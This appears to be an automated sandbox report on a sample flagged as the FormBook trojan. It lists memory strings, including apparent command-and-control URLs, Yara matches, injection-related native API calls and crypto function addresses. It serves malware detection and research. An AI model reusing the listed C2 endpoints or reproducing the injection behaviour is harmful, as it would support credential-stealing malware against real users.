2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed\|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\\|!+jZAeZq)jAo\|m5ka',Fk6x>DAbU.>y^-RSo6B)m8wln}weQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?

Source: relog.exe, 00000005.00000002.4105196845.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.000000000438A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thinkphp.cn
Source: aAqvujXSGNo.exe, 00000006.00000002.4106256857.0000000005347000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.x0x9x8x8x7x6.shop
Source: aAqvujXSGNo.exe, 00000006.00000002.4106256857.0000000005347000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.x0x9x8x8x7x6.shop/ps9q/
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: relog.exe, 00000005.00000002.4103860914.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Z9
Source: relog.exe, 00000005.00000002.4103860914.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: relog.exe, 00000005.00000003.2240887847.0000000007A04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: relog.exe, 00000005.00000002.4105196845.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2354562437.0000000033C54000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: relog.exe, 00000005.00000002.4105196845.0000000004A46000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000004066000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=rantup.com
Source: relog.exe, 00000005.00000002.4105196845.000000000508E000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.00000000046AE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BCD283 NtClose,	0_2_00BCD283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1C00 EntryPoint,NtProtectVirtualMemory,	0_2_00BA1C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2B60 NtClose,LdrInitializeThunk,	0_2_026D2B60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	0_2_026D2C70
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	0_2_026D2DF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D35C0 NtCreateMutant,LdrInitializeThunk,	0_2_026D35C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D4340 NtSetContextThread,	0_2_026D4340
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D4650 NtSuspendThread,	0_2_026D4650
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AF0 NtWriteFile,	0_2_026D2AF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AD0 NtReadFile,	0_2_026D2AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AB0 NtWaitForSingleObject,	0_2_026D2AB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BE0 NtQueryValueKey,	0_2_026D2BE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BF0 NtAllocateVirtualMemory,	0_2_026D2BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BA0 NtEnumerateValueKey,	0_2_026D2BA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2B80 NtQueryInformationFile,	0_2_026D2B80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2E30 NtWriteVirtualMemory,	0_2_026D2E30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2EE0 NtQueueApcThread,	0_2_026D2EE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2EA0 NtAdjustPrivilegesToken,	0_2_026D2EA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2E80 NtReadVirtualMemory,	0_2_026D2E80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F60 NtCreateProcessEx,	0_2_026D2F60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F30 NtCreateSection,	0_2_026D2F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FE0 NtCreateFile,	0_2_026D2FE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FA0 NtQuerySection,	0_2_026D2FA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FB0 NtResumeThread,	0_2_026D2FB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F90 NtProtectVirtualMemory,	0_2_026D2F90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C60 NtCreateKey,	0_2_026D2C60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C00 NtQueryInformationProcess,	0_2_026D2C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CF0 NtOpenProcess,	0_2_026D2CF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CC0 NtQueryVirtualMemory,	0_2_026D2CC0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CA0 NtQueryInformationToken,	0_2_026D2CA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D30 NtUnmapViewOfSection,	0_2_026D2D30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D00 NtSetInformationFile,	0_2_026D2D00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D10 NtMapViewOfSection,	0_2_026D2D10
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DD0 NtDelayExecution,	0_2_026D2DD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DB0 NtEnumerateKey,	0_2_026D2DB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3010 NtOpenDirectoryObject,	0_2_026D3010
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3090 NtSetValueKey,	0_2_026D3090
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D39B0 NtGetContextThread,	0_2_026D39B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3D70 NtOpenThread,	0_2_026D3D70
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3D10 NtOpenProcessToken,	0_2_026D3D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03284340 NtSetContextThread,LdrInitializeThunk,	5_2_03284340
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03284650 NtSuspendThread,LdrInitializeThunk,	5_2_03284650
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282B60 NtClose,LdrInitializeThunk,	5_2_03282B60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_03282BA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_03282BE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_03282BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AF0 NtWriteFile,LdrInitializeThunk,	5_2_03282AF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AD0 NtReadFile,LdrInitializeThunk,	5_2_03282AD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F30 NtCreateSection,LdrInitializeThunk,	5_2_03282F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FB0 NtResumeThread,LdrInitializeThunk,	5_2_03282FB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FE0 NtCreateFile,LdrInitializeThunk,	5_2_03282FE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_03282E80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_03282EE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_03282D30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_03282D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03282DF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DD0 NtDelayExecution,LdrInitializeThunk,	5_2_03282DD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C60 NtCreateKey,LdrInitializeThunk,	5_2_03282C60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_03282C70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_03282CA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032835C0 NtCreateMutant,LdrInitializeThunk,	5_2_032835C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032839B0 NtGetContextThread,LdrInitializeThunk,	5_2_032839B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282B80 NtQueryInformationFile,	5_2_03282B80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AB0 NtWaitForSingleObject,	5_2_03282AB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F60 NtCreateProcessEx,	5_2_03282F60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FA0 NtQuerySection,	5_2_03282FA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F90 NtProtectVirtualMemory,	5_2_03282F90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282E30 NtWriteVirtualMemory,	5_2_03282E30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282EA0 NtAdjustPrivilegesToken,	5_2_03282EA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D00 NtSetInformationFile,	5_2_03282D00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DB0 NtEnumerateKey,	5_2_03282DB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C00 NtQueryInformationProcess,	5_2_03282C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CF0 NtOpenProcess,	5_2_03282CF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CC0 NtQueryVirtualMemory,	5_2_03282CC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283010 NtOpenDirectoryObject,	5_2_03283010
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283090 NtSetValueKey,	5_2_03283090
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283D10 NtOpenProcessToken,	5_2_03283D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283D70 NtOpenThread,	5_2_03283D70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9200 NtCreateFile,	5_2_008D9200
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9370 NtReadFile,	5_2_008D9370
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9470 NtDeleteFile,	5_2_008D9470
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9510 NtClose,	5_2_008D9510
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9680 NtAllocateVirtualMemory,	5_2_008D9680
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310F197 NtQueryInformationProcess,	5_2_0310F197

Detected potential crypto function

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB91E3	0_2_00BB91E3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1990	0_2_00BA1990
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA31D0	0_2_00BA31D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BCF933	0_2_00BCF933
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA3AF0	0_2_00BA3AF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0A3A	0_2_00BB0A3A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0A43	0_2_00BB0A43
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB73C3	0_2_00BB73C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BAECE3	0_2_00BAECE3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1C00	0_2_00BA1C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0C63	0_2_00BB0C63
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA35B0	0_2_00BA35B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA35A7	0_2_00BA35A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2DD0	0_2_00BA2DD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2DC8	0_2_00BA2DC8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027202C0	0_2_027202C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A352	0_2_0275A352
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027603E6	0_2_027603E6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02728158	0_2_02728158
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690100	0_2_02690100
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027581CC	0_2_027581CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027541A2	0_2_027541A2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027601AA	0_2_027601AA
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BC6E0	0_2_026BC6E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4750	0_2_026C4750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269C7C0	0_2_0269C7C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02752446	0_2_02752446
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744420	0_2_02744420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274E4F6	0_2_0274E4F6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02760591	0_2_02760591
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275AB40	0_2_0275AB40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02756BD7	0_2_02756BD7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A2840	0_2_026A2840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AA840	0_2_026AA840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE8F0	0_2_026CE8F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026868B8	0_2_026868B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276A9A6	0_2_0276A9A6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0E59	0_2_026A0E59
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275EE26	0_2_0275EE26
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275EEDB	0_2_0275EEDB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275CE93	0_2_0275CE93
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2E90	0_2_026B2E90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714F40	0_2_02714F40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02742F30	0_2_02742F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E2F28	0_2_026E2F28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0F30	0_2_026C0F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692FC8	0_2_02692FC8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271EFA0	0_2_0271EFA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0C00	0_2_026A0C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690CF2	0_2_02690CF2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740CB5	0_2_02740CB5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AAD00	0_2_026AAD00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273CD1F	0_2_0273CD1F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269ADE0	0_2_0269ADE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B8DBF	0_2_026B8DBF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027412ED	0_2_027412ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BD2F0	0_2_026BD2F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BB2C0	0_2_026BB2C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A52A0	0_2_026A52A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268D34C	0_2_0268D34C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275132D	0_2_0275132D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E739A	0_2_026E739A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F0E0	0_2_0275F0E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027570E9	0_2_027570E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A70C0	0_2_026A70C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274F0CC	0_2_0274F0CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D516C	0_2_026D516C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268F172	0_2_0268F172
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276B16B	0_2_0276B16B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AB1B0	0_2_026AB1B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E5630	0_2_026E5630
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027516CC	0_2_027516CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F7B0	0_2_0275F7B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02691460	0_2_02691460
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F43F	0_2_0275F43F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757571	0_2_02757571
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027695C3	0_2_027695C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273D5B0	0_2_0273D5B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02713A6C	0_2_02713A6C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757A46	0_2_02757A46
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FA49	0_2_0275FA49
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274DAC6	0_2_0274DAC6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E5AA0	0_2_026E5AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02741AA3	0_2_02741AA3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273DAAC	0_2_0273DAAC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FB76	0_2_0275FB76
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02715BF0	0_2_02715BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026DDBF9	0_2_026DDBF9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BFB80	0_2_026BFB80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270D800	0_2_0270D800
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A38E0	0_2_026A38E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A9950	0_2_026A9950
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BB950	0_2_026BB950
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02735910	0_2_02735910
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A9EB0	0_2_026A9EB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FF09	0_2_0275FF09
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02663FD5	0_2_02663FD5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02663FD2	0_2_02663FD2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FFB1	0_2_0275FFB1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A1F92	0_2_026A1F92
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02719C32	0_2_02719C32
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FCF2	0_2_0275FCF2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757D73	0_2_02757D73
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A3D40	0_2_026A3D40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02751D5A	0_2_02751D5A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BFDC0	0_2_026BFDC0
